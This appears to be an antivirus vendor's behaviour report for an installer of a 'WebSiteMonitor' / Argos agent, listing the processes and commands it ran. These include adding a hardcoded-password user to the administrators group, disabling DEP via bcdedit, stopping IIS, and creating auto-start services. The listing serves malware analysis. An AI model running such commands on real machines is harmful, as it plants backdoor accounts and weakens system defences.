'%TEMP%\nsc2.tmp\nsd.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.CollectBSL"' (with hidden window)
'%TEMP%\nsc2.tmp\ns13.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.BandwitdhPerf"' (with hidden window)
'%TEMP%\nsc2.tmp\ns1b.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.WebserviceClientBSL.dll"' (with hidden window)
'%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%WINDIR%\TEMP\gmgo1kr3.cmdline"' (with hidden window)
'%TEMP%\nsc2.tmp\ns1a.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.TransactionJobBSL.dll"' (with hidden window)
'%TEMP%\nsc2.tmp\nse.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.UtilsBSL"' (with hidden window)
'%TEMP%\nsc2.tmp\ns19.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.WIN.dll"' (with hidden window)
'%TEMP%\nsc2.tmp\ns17.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.BrowserWIN.dll"' (with hidden window)
'%TEMP%\nsc2.tmp\nsf.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.Win32APIBSL"' (with hidden window)
'%TEMP%\nsc2.tmp\ns10.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.MeasureListManagerService"' (with hidden window)
'%TEMP%\nsc2.tmp\ns16.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.UnitInfoClient.XmlSerializers"' (with hidden window)
'%TEMP%\nsc2.tmp\ns15.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.UnitInfoClient"' (with hidden window)
'%ALLUSERSPROFILE%\application data\package cache\{615bc16d-60f5-482e-91b3-b51d8130963b}\vcredist_x86.exe' -q -burn.elevated BurnPipe.{CEBEA10C-235A-4172-9DC0-3E4F471CAB2C} {7960686C-7D98-417F-8042-56E5DB5C886B} 4080' (with hidden window)
'%TEMP%\nsc2.tmp\ns14.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.ArgosCallService"' (with hidden window)
'%TEMP%\nsc2.tmp\ns18.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.BrowserWIN2014.dll"' (with hidden window)
'%TEMP%\nsc2.tmp\ns11.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.CollectManagerBSL"' (with hidden window)
'%TEMP%\nsc2.tmp\nsc.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.WebserviceClientBSL.XmlSerializers"' (with hidden window)
'%TEMP%\nsc2.tmp\ns1d.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.CollectBSL.dll"' (with hidden window)
'%TEMP%\nsc2.tmp\ns1e.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.UtilsBSL.dll"' (with hidden window)
'%TEMP%\nsc2.tmp\nsb.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.WebserviceClientBSL"' (with hidden window)
'%TEMP%\nsc2.tmp\ns1f.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.Win32APIBSL.dll"' (with hidden window)
'%TEMP%\nsc2.tmp\ns20.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.MeasureListManagerService.dll"' (with hidden window)
'%TEMP%\nsc2.tmp\ns21.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.CollectManagerBSL.dll"' (with hidden window)
'%TEMP%\nsc2.tmp\ns9.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.WIN"' (with hidden window)
'%TEMP%\nsc2.tmp\ns22.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.SystemMonitor.dll"' (with hidden window)
'%TEMP%\nsc2.tmp\ns8.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.BrowserWIN2014"' (with hidden window)
'%TEMP%\nsc2.tmp\ns23.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.BandwitdhPerf.dll"' (with hidden window)
'%TEMP%\nsc2.tmp\ns24.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.UnitInfoClient.dllcd"' (with hidden window)
'%TEMP%\nsc2.tmp\ns12.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.SystemMonitor"' (with hidden window)
'%TEMP%\nsc2.tmp\ns7.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.BrowserWIN"' (with hidden window)
'%TEMP%\nsc2.tmp\ns25.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.UnitInfoClient.XmlSerializers.dll"' (with hidden window)
'%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%WINDIR%\TEMP\RES32.tmp" "%WINDIR%\Temp\CSC31.tmp"' (with hidden window)

Executes the following

'<SYSTEM32>\cmd.exe' /C net user argos gksfutneh /ADD
'<SYSTEM32>\cmd.exe' /C sc create WebSiteMonitorWebService binPath= C:\Argos\Agent\Win\WebSiteMonitorWebService.exe start= auto type= interact type= own
'<SYSTEM32>\sc.exe' create WebSiteMonitorWebService binPath= C:\Argos\Agent\Win\WebSiteMonitorWebService.exe start= auto type= interact type= own
'<SYSTEM32>\cmd.exe' /C C:\Argos\Agent\Win\tracetcp www.vi##ns.net -n -t 100 -p 3 -F -m 30
'<SYSTEM32>\cmd.exe' /C sc stop W3SVC
'<SYSTEM32>\sc.exe' stop W3SVC
'<SYSTEM32>\cmd.exe' /C sc stop IISADMIN
'<SYSTEM32>\sc.exe' stop IISADMIN
'<SYSTEM32>\cmd.exe' /C sc config W3SVC start= disabled
'<SYSTEM32>\sc.exe' config W3SVC start= disabled
'<SYSTEM32>\sc.exe' config IISADMIN start= disabled
'%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%WINDIR%\TEMP\gmgo1kr3.cmdline"
'%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%WINDIR%\TEMP\fzbxfftq.cmdline"
'<SYSTEM32>\svchost.exe' -k HTTPFilter
'%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%WINDIR%\TEMP\RES2C.tmp" "%WINDIR%\Temp\CSC2B.tmp"
'%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%WINDIR%\TEMP\mez0fdhn.cmdline"
'%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%WINDIR%\TEMP\RES2E.tmp" "%WINDIR%\Temp\CSC2D.tmp"
'<SYSTEM32>\verclsid.exe' /C {B5A7F190-DDA6-4420-B3BA-52453494E6CD} /I {00000000-0000-0000-C000-000000000046} /X 0x401
'<SYSTEM32>\sc.exe' stop w32Time
'%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%WINDIR%\TEMP\ia3uvj1g.cmdline"
'%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%WINDIR%\TEMP\RES30.tmp" "%WINDIR%\Temp\CSC2F.tmp"
'<SYSTEM32>\sc.exe' create WebSiteMonitorWatcherService binPath= C:\Argos\Agent\Win\WebSiteMonitorWatcher.exe start= auto
'<SYSTEM32>\cmd.exe' /C sc config IISADMIN start= disabled
'<SYSTEM32>\cmd.exe' /C sc create WebSiteMonitorWatcherService binPath= C:\Argos\Agent\Win\WebSiteMonitorWatcher.exe start= auto
'<SYSTEM32>\findstr.exe' /R /C:"8000[ ]*0.*LISTENING"
'<SYSTEM32>\net.exe' user argos gksfutneh /ADD
'<SYSTEM32>\net1.exe' user argos gksfutneh /ADD
'<SYSTEM32>\cmd.exe' /C net localgroup administrators argos /ADD
'<SYSTEM32>\net.exe' localgroup administrators argos /ADD
'<SYSTEM32>\net1.exe' localgroup administrators argos /ADD
'<SYSTEM32>\cmd.exe' /C bcdedit.exe /set {current} nx AlwaysOff
'<SYSTEM32>\cmd.exe' /C %WINDIR%\Microsoft.NET\Framework\v2.0.50727\aspnet_regiis.exe -i
'%WINDIR%\microsoft.net\framework\v2.0.50727\aspnet_regiis.exe' -i
'<SYSTEM32>\cmd.exe' /C netstat -an | FINDSTR /R /C:"8000[ ]*0.*LISTENING" > nul && ( echo 8000 > C:\Argos\Agent\Win\IISPORT.txt )
'<SYSTEM32>\netstat.exe' -an
'<SYSTEM32>\cmd.exe' /C sc create WebSiteMonitorManagerService binPath= C:\Argos\Agent\Win\WebSiteMonitorManager.exe start= auto type= interact type= own
'<SYSTEM32>\cmd.exe' /C netstat -an | FINDSTR /R /C:"8080[ ]*0.*LISTENING" > nul && ( echo 8080 > C:\Argos\Agent\Win\IISPORT.txt )
'<SYSTEM32>\findstr.exe' /R /C:"8080[ ]*0.*LISTENING"
'<SYSTEM32>\cmd.exe' /C netstat -an | FINDSTR /R /C:"80[ ]*0.*LISTENING" > nul && ( echo 80 > C:\Argos\Agent\Win\IISPORT.txt )
'<SYSTEM32>\findstr.exe' /R /C:"80[ ]*0.*LISTENING"
'<SYSTEM32>\cmd.exe' /C copy "C:\Argos\Agent\Win\WebSiteMonitorWebService.exe.80.config" "C:\Argos\Agent\Win\WebSiteMonitorWebService.exe.config"
'<SYSTEM32>\cmd.exe' /C del "C:\Argos\Agent\Win\WebSiteMonitorWebService.exe.*.config"
'<SYSTEM32>\cmd.exe' /C del "C:\Argos\Agent\Win\WebSiteMonitorAgent_Fail.exe"
'<SYSTEM32>\cmd.exe' /C rmdir "C:\Argos\Agent\WebService\" /S /Q
'<SYSTEM32>\cmd.exe' /C SETX /M IS_FOREGROUND_PROBE True
'<SYSTEM32>\sc.exe' create WebSiteMonitorManagerService binPath= C:\Argos\Agent\Win\WebSiteMonitorManager.exe start= auto type= interact type= own
'%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%WINDIR%\TEMP\RES32.tmp" "%WINDIR%\Temp\CSC31.tmp"

Технології

Терміни

Навчання

Міфи

Technical Information

Рекомендации по лечению

Демо бесплатно на 14 дней